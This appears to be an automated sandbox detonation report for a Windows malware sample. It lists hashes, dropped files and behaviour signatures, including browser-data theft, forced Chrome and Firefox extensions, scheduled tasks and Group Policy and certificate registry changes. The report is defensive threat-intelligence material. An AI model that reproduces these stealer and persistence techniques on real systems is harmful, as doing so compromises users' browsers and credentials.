MD5 835bc505714a8e413f1c36d5a11b6057
SHA1 6282d89795e5ad5c092be0e385a51b5b9a0b727d
SHA256 f9e1cc29fde3d5689d32529d0f1c83329219afa0e9d13fd6ff8bae7720a577f7
SHA512 b45c0924b6d656caa8a24937affff534dec47168ede700f47d45d94f7a77819564248c56098792094809ebd58e7b148f77e0f1091caca6ad516b58e7e5e904e1

C:\Windows\Temp\IzRZTwSZebgYVSAl\LYlDDAKO\YmkxHCZ.dll

MD5 fdcc0ef7b4cb82035c51f55cfece6cf1
SHA1 ee1d2e870309f5ba05e0216d3ea909c1ae9d8ee4
SHA256 7c3415f11576e09a0910da101422f044162b11607aa670452843436925d8c26b
SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/3152-487-0x0000000003790000-0x000000000381A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs.js

MD5 b4d84e36d770c199b8f670f0f09671c9
SHA1 166cb2b9fecec12e9ae753df44ab7f254ba78b7c
SHA256 fc6a46722a17e141dfc176b8c47aaaabf3a8e3148481de26759657576eb1dfb2
SHA512 16d934b414e606daeba58a2367b66d762d76e35b1a10f5a062bd3cab9e7fc88c9442b22543bcc228aba7d0e83993e89dd293be0ec9d642840d5e21a3b3c059f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 f0a675ab960bda7539ee493e0325e69e
SHA1 a17738e59326486b0e84372a0975f88269c66fbe
SHA256 9f3a7714fdba082ede0774807e4e82329bccaf3de68643bbfc19050d281a4dfe
SHA512 d5441928a19a9eed5f25c0b5de6b39b27911ef9033002ddc2a15e4ef1d5616e2821586efd3177327d9114f433e9e067027e91a9202e3ce426d672a0edc5c8294

memory/3424-500-0x0000000001760000-0x0000000001D48000-memory.dmp

memory/3152-505-0x0000000003820000-0x00000000038F5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8fb589dee52f3a151eb9ec5748e2d9c7
SHA1 c430cf333e917628c4e887c29975d933d7c74cb1
SHA256 9a0c40d4a7079f1c661386e2caff1e295c6fe717e6d889d494973743e2025fc4
SHA512 f39b0ffc2a3b473b4c56b479b7b09616426eb982ead82283d91d6eb133ec488a9b6a47cdb362313bc42116b8ebb240bac4960f74c5d2915f1ee671d0616c44d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 51a2a2654889113bab335e0109636e8c
SHA1 171ca42275f28a9d27494ff2d68e59d5cbbe9180
SHA256 e0a110ee8dfb4bec35a98693b0b223583e6b8ab6e24373835c3375a3d0357242
SHA512 88107cd926ffd7a4ed1a833d0a4964ea88d9af3551b56b74fb28fcc5c2be92517acb84864cfc464c15226dbb22169755b87ad1d9587bd29e821a318ec086ee99

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-03 10:57

Reported

2024-04-03 11:00

Platform

win11-20240221-en

Max time kernel

150s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\WTYIUVQ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\MIqjTUamxhRiS.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\XDqQbzK.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\CEULdTQ.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\IjUmhi.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\CswRwZy.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7417.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b33ab3a0-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b33ab3a0-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe N/A
